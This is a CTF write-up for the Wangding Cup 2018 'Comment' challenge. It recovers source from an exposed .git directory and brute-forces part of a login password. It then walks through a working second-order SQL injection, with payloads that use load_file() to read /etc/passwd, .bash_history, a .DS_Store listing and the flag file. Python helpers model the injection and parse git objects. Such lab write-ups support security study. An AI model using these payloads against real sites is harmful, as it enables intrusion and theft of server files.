[Wangding Cup 2018] Comment (BUUCTF writeup)

Background knowledge

Recovering files from a leaked .git

How do you tell whether a file needs to be recovered?

Check whether the file has been committed; if it has not, you need to recover it. The challenge looks like this:
(screenshot of the challenge description)
The description tells us the file has not been committed, so it has to be recovered with git.

Script and usage

We use WangYihang's GitHacker script for the recovery.
First install the script, then open a console and run

python GitHacker.py http://ffd1ae28-f0e2-41c3-9522-ce58080f91e6.node3.buuoj.cn/.git/   # the URL of the leaked .git directory

Then change into the newly created directory and run

git log --reflog

which lists the commit history, including commits that are only reachable through the reflog:
(screenshot of the git log output)
Copy the commit hash marked by the arrow and run

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

Then open the file; the complete code is as follows:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    // every field is escaped with addslashes() before it is inserted
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
        // category is taken straight from the stored row and spliced in unescaped
        $category = mysql_fetch_array($result)['category'];
        $content = addslashes($_POST['content']);
        $sql = "insert into comment
                set category = '$category',
                    content = '$content',
                    bo_id = '$bo_id'";
        $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>
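Why `git reset --hard <hash>` can bring the file back: a commit that is no longer on any branch still has its commit, tree and blob objects under .git/objects, which is exactly what GitHacker downloads and what `git log --reflog` enumerates. The Python below is an added example written for this page, not part of the original writeup and not GitHacker's code. It implements the loose-object read path git itself uses (zlib-inflate, split the `<type> <size>\0` header, parse commit and tree objects) and walks a constructed two-commit repository that it builds in a temporary directory; the file names and contents in that sample repository are made up for the demo.

```python
from __future__ import annotations

import hashlib
import os
import tempfile
import zlib


def hash_object(obj_type: str, body: bytes) -> tuple[str, bytes]:
    """(object id, raw object) as git computes them: SHA-1 over '<type> <length>\\0<body>'."""
    raw = obj_type.encode() + b" " + str(len(body)).encode() + b"\x00" + body
    return hashlib.sha1(raw).hexdigest(), raw


def write_loose_object(git_dir: str, obj_type: str, body: bytes) -> str:
    """Store a zlib-compressed loose object at objects/xx/yyyy... and return its id."""
    oid, raw = hash_object(obj_type, body)
    path = os.path.join(git_dir, "objects", oid[:2], oid[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return oid


def read_loose_object(git_dir: str, oid: str) -> tuple[str, bytes]:
    """Inflate a loose object and split off its '<type> <length>' header. Every commit,
    tree and blob that a dumper downloads or `git reset --hard` checks out is read this way."""
    path = os.path.join(git_dir, "objects", oid[:2], oid[2:])
    with open(path, "rb") as f:
        raw = zlib.decompress(f.read())
    header, body = raw.split(b"\x00", 1)
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {oid}: header says {size} bytes, got {len(body)}")
    return obj_type, body


def parse_commit(body: bytes) -> dict:
    """Tree id, parent ids and message of a commit object."""
    headers, _, message = body.partition(b"\n\n")
    info: dict = {"tree": None, "parents": [], "message": message.decode()}
    for line in headers.decode().splitlines():
        key, _, value = line.partition(" ")
        if key == "tree":
            info["tree"] = value
        elif key == "parent":
            info["parents"].append(value)
    return info


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Tree entries are '<mode> <name>\\0' followed by the entry's 20-byte binary SHA-1."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\x00", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def files_at_commit(git_dir: str, commit_oid: str) -> dict[str, bytes]:
    """Top-level regular files (mode 100xxx; 40000 would be a subtree) at a commit."""
    tree_oid = parse_commit(read_loose_object(git_dir, commit_oid)[1])["tree"]
    return {name: read_loose_object(git_dir, oid)[1]
            for mode, name, oid in parse_tree(read_loose_object(git_dir, tree_oid)[1])
            if mode.startswith("100")}


def walk_history(git_dir: str, start_oid: str) -> list[str]:
    """Follow first-parent links from start_oid back to the root commit."""
    chain, cur = [], start_oid
    while cur:
        chain.append(cur)
        parents = parse_commit(read_loose_object(git_dir, cur)[1])["parents"]
        cur = parents[0] if parents else None
    return chain


def build_demo_repo(git_dir: str) -> tuple[str, str]:
    """Constructed sample, not the challenge's repository: commit A holds the complete
    handler, commit B replaces it with a stub. File names and contents are made up."""
    def commit(files: dict[str, bytes], parents: list[str], msg: str) -> str:
        entries = b"".join(
            b"100644 " + name.encode() + b"\x00" + bytes.fromhex(write_loose_object(git_dir, "blob", data))
            for name, data in sorted(files.items()))      # git keeps tree entries name-sorted
        tree = write_loose_object(git_dir, "tree", entries)
        hdr = f"tree {tree}\n" + "".join(f"parent {p}\n" for p in parents)
        hdr += "author ctf <ctf@example.invalid> 0 +0000\ncommitter ctf <ctf@example.invalid> 0 +0000\n"
        return write_loose_object(git_dir, "commit", f"{hdr}\n{msg}\n".encode())

    a = commit({"index.php": b"<?php\n", "write_do.php": b"<?php // complete handler\n"}, [], "add source")
    b = commit({"index.php": b"<?php\n", "write_do.php": b"<?php // stub\n"}, [a], "remove source")
    return a, b


def demo() -> dict:
    """Build the sample repo in a temp dir and recover the older file content from it."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    older, head = build_demo_repo(git_dir)
    return {"head": head, "older": older, "chain": walk_history(git_dir, head),
            "head_files": files_at_commit(git_dir, head),
            "older_files": files_at_commit(git_dir, older)}
```

Calling `demo()` returns the two commit ids, the first-parent chain from the stub commit back to the full one, and the file contents at each; the older blob is still readable even though nothing points at that commit any more, which is the whole reason the `git reset --hard` step in the writeup works. Real repositories also store objects in packfiles, which this reader does not handle.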

Second-order injection

Look at the following code:

$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);

together with

$category = mysql_fetch_array($result)['category'];

At do=write the category field is run through addslashes(), which puts a backslash in front of every single quote, double quote, backslash and NUL byte. MySQL consumes that backslash when it parses the quoted literal, so the board row ends up holding the original, unescaped text. At do=comment the category is read back from the database and spliced into the next INSERT without any escaping at all, which is what makes the second-order injection possible.

For example, if we POST category=123'/*, addslashes() sends 123\'/* to MySQL, but the value stored in the board row is 123'/* again. When that row is later used to build the comment statement it becomes

$sql = "insert into comment
            set category = '123'/*',"

and the stored single quote closes the string literal, so the injection lands at this point.
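To make the second-order injection concrete, here is an added Python model of the whole pipeline (example code written for this page, not the challenge's PHP): PHP's addslashes() at write time, MySQL consuming the escaping backslash when it stores the literal, the raw splice at comment time, and a small comment stripper that shows the statement the MySQL parser is actually left with. The payload category aaa',content=database(),/* with comment content */#, and a bo_id of 1, are the values assumed for the demo; the stripper only handles /* */, # and -- comments and deliberately ignores /*! */ versioned comments.

```python
from __future__ import annotations

import re


def php_addslashes(s: str) -> str:
    """Emulate PHP addslashes(): a backslash before ' " \\ and NUL, nothing else."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def mysql_unescape_literal(s: str) -> str:
    """What MySQL stores after parsing an escaped '...' literal: the backslash is consumed.
    Subset of MySQL's escapes (\\0 \\n \\r \\t); any other escaped char maps to itself."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append({"0": "\x00", "n": "\n", "r": "\r", "t": "\t"}.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def strip_mysql_comments(sql: str) -> str:
    """Approximate the statement the MySQL parser executes: drop /* */, '#' and '-- '
    comments that lie outside string literals, then collapse whitespace.
    Versioned /*! ... */ comments (which MySQL does execute) are not modelled."""
    out, i, n, in_str = [], 0, len(sql), False
    while i < n:
        c = sql[i]
        if in_str:
            if c == "\\" and i + 1 < n:                  # backslash escape inside literal
                out.append(sql[i:i + 2])
                i += 2
                continue
            if c == "'" and sql.startswith("''", i):     # doubled quote inside literal
                out.append("''")
                i += 2
                continue
            if c == "'":
                in_str = False
            out.append(c)
            i += 1
        elif c == "'":
            in_str = True
            out.append(c)
            i += 1
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end < 0 else end + 2                # unterminated /* eats the rest
            out.append(" ")
        elif c == "#" or sql.startswith("-- ", i):
            end = sql.find("\n", i)
            i = n if end < 0 else end                    # line comment stops at the newline
        else:
            out.append(c)
            i += 1
    return " ".join("".join(out).split())


def store_board_post(category: str, title: str, content: str) -> tuple[str, dict]:
    """do=write: addslashes() every field and build the INSERT the page shows. Returns the
    statement and what the board row holds once MySQL has parsed the escaped literals."""
    esc = {k: php_addslashes(v) for k, v in
           {"category": category, "title": title, "content": content}.items()}
    sql = ("insert into board\n"
           f"            set category = '{esc['category']}',\n"
           f"                title = '{esc['title']}',\n"
           f"                content = '{esc['content']}'")
    return sql, {k: mysql_unescape_literal(v) for k, v in esc.items()}


def comment_query(stored_category: str, content: str, bo_id: str) -> str:
    """do=comment: the category is spliced in straight from the stored row, unescaped."""
    return ("insert into comment\n"
            f"            set category = '{stored_category}',\n"
            f"                content = '{php_addslashes(content)}',\n"
            f"                bo_id = '{php_addslashes(bo_id)}'")


def effective_comment_statement(category: str, comment_content: str, bo_id: str = "1") -> str:
    """Whole chain: post with the given category, then comment on that post; return the
    statement as the MySQL parser sees it."""
    _, row = store_board_post(category, "t", "x")
    return strip_mysql_comments(comment_query(row["category"], comment_content, bo_id))
```

Running `effective_comment_statement("aaa',content=database(),/*", "*/#")` yields `insert into comment set category = 'aaa',content=database(), bo_id = '1'`: the block comment swallows the line break and the leftover `',`, and the `#` in the comment content removes what follows `*/` on that line. Trying the same with a bare `#` instead (`aaa',content=database()#` and any comment text) leaves `content=database() content = 'x', bo_id = '1'`, a syntax error, which is exactly why the writeup switches to `/* */`. The write-time statement itself is safe, because there the `/*` sits inside a properly escaped literal.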

Reading files with SQL

The LOAD_FILE() function reads a file and returns its contents as a string. To use it, the file must be on the database server host, you must give its full path, and the MySQL user must have the FILE privilege. The file must be readable by the server process and smaller than max_allowed_packet bytes; if secure_file_priv is set to a directory, the file must also live under that directory. If the file does not exist or cannot be read because one of these conditions is not met, the function returns NULL rather than an error, so a NULL result does not tell you which condition failed.

.bash_history

On Unix/Linux systems .bash_history holds a user's shell command history; it sits in that user's home directory, i.e. ~/.bash_history. Read through LOAD_FILE(), it often reveals the paths and commands used while the box was set up.

.DS_Store file disclosure

.DS_Store is the metadata file macOS Finder writes into every directory it browses; it records the names of the directory's entries, so a copy left on a web server discloses the file listing. There is a script for downloading a leaked .DS_Store and the files it lists to the local machine, but it is not needed for this challenge.

Solving the challenge

We already have the source, but because $_SESSION['login'] is not 'yes' the page redirects us to the login screen.
(screenshot of the login page)
The login page hints at the username and password; only the last three digits of the password are missing, and brute-forcing them gives 666.
After logging in we can construct the category.
Note that the SQL statement spans four lines and # only comments out the rest of the current line, so we use /* */ to swallow the line breaks.
On the post form we submit category=aaa',content=database(),/* with arbitrary title and content, then comment on the new post with the content */#. The statement becomes:

$sql = "insert into comment
            set category = 'aaa',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

Result:
(screenshot of the comment page showing the database name)
The injection succeeds.
Next we read files with load_file():
payload: 123',content=(select(load_file('/etc/passwd'))),/*
(screenshot of /etc/passwd)
With the home directory found in /etc/passwd we read .bash_history the same way:
(screenshot of .bash_history)
It shows a .DS_Store file under /tmp/html. Read that file as hex and decode it:
(screenshot of the decoded .DS_Store)
This gives the names of all files in the html folder.
Reading the flag file yields the flag:
payload: aaa',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
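Decoding the .DS_Store dump: the hex returned by hex(load_file(...)) has to be turned back into bytes and the file names pulled out of Finder's records. The Python below is an added example, not the download script the background section refers to and not the tool used in the writeup. It skips the file's B-tree structure and instead scans for the record layout (u32 name length, UTF-16BE name, 4-byte structure id, 4-byte type tag), which is enough to list a directory. The sample file it parses is constructed inline with made-up records, and the file names in it are only illustrative.

```python
from __future__ import annotations

import struct

DS_STORE_TYPES = {b"long", b"shor", b"bool", b"blob", b"type", b"ustr", b"comp", b"dutc"}


def ds_store_filenames(data: bytes) -> list[str]:
    """Heuristic record scan; no B-tree parsing is needed just to list a directory.
    Every .DS_Store record is laid out as
        u32 name length (UTF-16 code units) | name, UTF-16BE | 4-byte struct id | 4-byte type | value
    so we look for a known type tag, require a printable 4-byte struct id (Iloc, bwsp, ...)
    in front of it, then walk back over candidate name lengths until the u32 length field
    in front of the name matches. Names come back in file order, deduplicated."""
    found: dict[str, None] = {}
    for i in range(4, len(data) - 3):
        if data[i:i + 4] not in DS_STORE_TYPES:
            continue
        if not all(0x20 <= b < 0x7F for b in data[i - 4:i]):
            continue
        name_end = i - 4
        for name_len in range(1, 256):
            start = name_end - 2 * name_len - 4
            if start < 0:
                break
            if struct.unpack(">I", data[start:start + 4])[0] != name_len:
                continue
            try:
                name = data[start + 4:name_end].decode("utf-16-be")
            except UnicodeDecodeError:
                continue
            if name.isprintable():
                found.setdefault(name)
            break
    return list(found)


def filenames_from_hex(hex_dump: str) -> list[str]:
    """For the load_file() route: hex(load_file('.../.DS_Store')) output -> names."""
    return ds_store_filenames(bytes.fromhex(hex_dump.strip()))


def make_record(name: str, struct_id: bytes, type_tag: bytes, value: bytes) -> bytes:
    """Serialize one record in the layout described above (used to build the sample)."""
    encoded = name.encode("utf-16-be")
    return struct.pack(">I", len(encoded) // 2) + encoded + struct_id + type_tag + value


def constructed_ds_store() -> bytes:
    """Constructed sample, not a dump from the challenge: the 'Bud1' magic, filler, and one
    Iloc (icon position) record per entry, which Finder writes for every item it shows."""
    iloc = struct.pack(">I", 16) + bytes(16)          # 'blob' values are length-prefixed
    return (b"\x00\x00\x00\x01Bud1" + bytes(28)
            + make_record("comment.php", b"Iloc", b"blob", iloc)
            + make_record("flag_8946e1ff1ee3e40f.php", b"Iloc", b"blob", iloc)
            + make_record("index.php", b"Iloc", b"blob", iloc)
            + bytes(16))
```

Paste the hex string from the injection result into `filenames_from_hex()` to get the listing. Because the scan is pattern-based it also works on a partially truncated dump (for example one cut off by max_allowed_packet), at the cost of occasionally missing or misreading a record that straddles the cut.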
Reference article:
https://www.cnblogs.com/Tkitn/p/11649255.html

Source: https://blog.csdn.net/weixin_44377940/article/details/104991188